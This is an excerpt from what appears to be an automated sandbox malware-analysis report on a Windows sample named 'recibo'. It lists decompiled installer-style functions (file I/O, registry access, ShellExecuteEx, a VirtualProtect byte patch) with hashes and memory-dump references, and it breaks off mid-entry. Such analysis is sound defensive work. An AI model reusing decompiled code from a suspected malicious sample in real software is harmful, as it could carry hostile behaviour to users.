                                                                                  • API String ID: 3562171763-0
                                                                                  • Opcode ID: 37dd8d0ca5ccfa2b7dc85521419f1992b48514a6c3f6d2a4e9192acb65122244
                                                                                  • Instruction ID: 97031ceaf8e9c96da62d10e645a43f8a4e886df5684b2e10da682d8a0e9c10a3
                                                                                  • Opcode Fuzzy Hash: 37dd8d0ca5ccfa2b7dc85521419f1992b48514a6c3f6d2a4e9192acb65122244
                                                                                  • Instruction Fuzzy Hash: C3F09631A08124E6CB117BA69E4DE5E21549F82364B24063FF011B11D1D9BCC902659E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00402891 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 33%
                                                                                  			E00402891(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t19;

				_t15 = __edx;
				_pop(ds);
				if(__eflags != 0) {
					_t8 = E00402D84(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
					_t10 = SetFilePointer(E0040649D(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E00406484();
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}










                                                                                  0x00402891
                                                                                  0x00402891
                                                                                  0x00402892
                                                                                  0x0040289a
                                                                                  0x0040289f
                                                                                  0x004028a0
                                                                                  0x004028af
                                                                                  0x004028b8
                                                                                  0x004028be
                                                                                  0x00402ba1
                                                                                  0x00402ba4
                                                                                  0x00402ba4
                                                                                  0x004028b8
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF
                                                                                    • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePointerwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 327478801-0
                                                                                  • Opcode ID: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
                                                                                  • Instruction ID: a13d1cf18dcce6f7d85bed0b4e0fde0de6b16079219dfacd376ffc086bc6f252
                                                                                  • Opcode Fuzzy Hash: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
                                                                                  • Instruction Fuzzy Hash: D3E09271A04105BFDB01EFA5AE499AEB3B8EF44319B10483BF102F00C1DA794D119B2D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E004023B2(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402DA6(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
					_t13 = E00402DA6(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
					_t11 = E00402DA6(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}







                                                                                  0x004023b2
                                                                                  0x004023b2
                                                                                  0x004023b4
                                                                                  0x004023b8
                                                                                  0x004023bb
                                                                                  0x004023c0
                                                                                  0x004023c5
                                                                                  0x004023ce
                                                                                  0x004023ce
                                                                                  0x004023d3
                                                                                  0x004023dc
                                                                                  0x004023dc
                                                                                  0x004023e9
                                                                                  0x004015b4
                                                                                  0x004015b6
                                                                                  0x0040292e
                                                                                  0x0040292e
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileStringWrite
                                                                                  • String ID:
                                                                                  • API String ID: 390214022-0
                                                                                  • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                  • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                                  • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                  • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004063D8 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                                  0x004063e2
                                                                                  0x004063eb
                                                                                  0x00406401
                                                                                  0x00000000
                                                                                  0x00406401
                                                                                  0x004063ef
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                  • Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
                                                                                  • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                  • Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004060DF Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E004060DF(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                  0x004060e3
                                                                                  0x004060f3
                                                                                  0x004060fb
                                                                                  0x00000000
                                                                                  0x00406102
                                                                                  0x00000000
                                                                                  0x00406104

                                                                                  APIs
                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3934441357-0
                                                                                  • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                  • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                                                  • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                  • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E004060B0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                  0x004060b4
                                                                                  0x004060c4
                                                                                  0x004060cc
                                                                                  0x00000000
                                                                                  0x004060d3
                                                                                  0x00000000
                                                                                  0x004060d5

                                                                                  APIs
                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                  • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                                                  • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                  • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 71542A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x71545048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x7154505c, 4, 0x40, 0x7154504c); // executed
					 *0x7154505c = 0xc2;
					 *0x7154504c = 0;
					 *0x71545054 = 0;
					 *0x71545068 = 0;
					 *0x71545058 = 0;
					 *0x71545050 = 0;
					 *0x71545060 = 0;
					 *0x7154505e = 0;
				}
				return 1;
			}



                                                                                  0x71542a88
                                                                                  0x71542a8d
                                                                                  0x71542a9d
                                                                                  0x71542aa5
                                                                                  0x71542aac
                                                                                  0x71542ab1
                                                                                  0x71542ab6
                                                                                  0x71542abb
                                                                                  0x71542ac0
                                                                                  0x71542ac5
                                                                                  0x71542aca
                                                                                  0x71542aca
                                                                                  0x71542ad2

                                                                                  APIs
                                                                                  • VirtualProtect.KERNELBASE(7154505C,00000004,00000040,7154504C), ref: 71542A9D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23409278912.0000000071541000.00000020.00000001.01000000.00000004.sdmp, Offset: 71540000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23409236416.0000000071540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23409345991.0000000071544000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23409401287.0000000071546000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_71540000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: 9cd8d5e50c349d526449c4257ee4e49010863ce40793ff42845b6072ff94cc6d
                                                                                  • Instruction ID: 37f108c219235121d58f2c7da2d7ea0a43321af300d78f8999359934b43c51cb
                                                                                  • Opcode Fuzzy Hash: 9cd8d5e50c349d526449c4257ee4e49010863ce40793ff42845b6072ff94cc6d
                                                                                  • Instruction Fuzzy Hash: 66F0C9BA568384DEC369CF3B84447093FF0BB09304B36462AEDACDA240E3744048DB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004063AA Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E004063AA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                                  0x004063b4
                                                                                  0x004063bb
                                                                                  0x004063ce
                                                                                  0x00000000
                                                                                  0x004063ce
                                                                                  0x004063bf
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                  • Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
                                                                                  • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                  • Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                                                                  0x004015ae
                                                                                  0x004015b4
                                                                                  0x004015b6
                                                                                  0x0040292e
                                                                                  0x0040292e
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 30328d7073751e656d59c65da3bf6c6accfc47a5a9bf7eee50ca0d6ba827389c
                                                                                  • Instruction ID: 33d43a8ddb5fee1851102b8e64c9f064c627007e01bf6cdc746e786b0f5045d9
                                                                                  • Opcode Fuzzy Hash: 30328d7073751e656d59c65da3bf6c6accfc47a5a9bf7eee50ca0d6ba827389c
                                                                                  • Instruction Fuzzy Hash: 30D01772B08110DBDB11DBA8AA48B9D72A4AB50368B208537D111F61D0E6B8C945AA19
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004044E5 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E004044E5(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x433ed8; // 0x1043c
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                                                  0x004044e5
                                                                                  0x004044ec
                                                                                  0x004044f7
                                                                                  0x00000000
                                                                                  0x004044f7
                                                                                  0x004044fd

                                                                                  APIs
                                                                                  • SendMessageW.USER32(0001043C,00000000,00000000,00000000), ref: 004044F7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                  • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                                                                  • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                  • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00405B63 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00405B63(struct _SHELLEXECUTEINFOW* _a4) {
				struct _SHELLEXECUTEINFOW* _t4;
				int _t5;

				_t4 = _a4;
				_t4->lpIDList = _t4->lpIDList & 0x00000000;
				_t4->cbSize = 0x3c; // executed
				_t5 = ShellExecuteExW(_t4); // executed
				return _t5;
			}





                                                                                  0x00405b63
                                                                                  0x00405b68
                                                                                  0x00405b6c
                                                                                  0x00405b72
                                                                                  0x00405b78

                                                                                  APIs
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00405B72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell
                                                                                  • String ID:
                                                                                  • API String ID: 587946157-0
                                                                                  • Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                                  • Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
                                                                                  • Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                                  • Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004044CE Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E004044CE(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                                                  0x004044dc
                                                                                  0x004044e2

                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
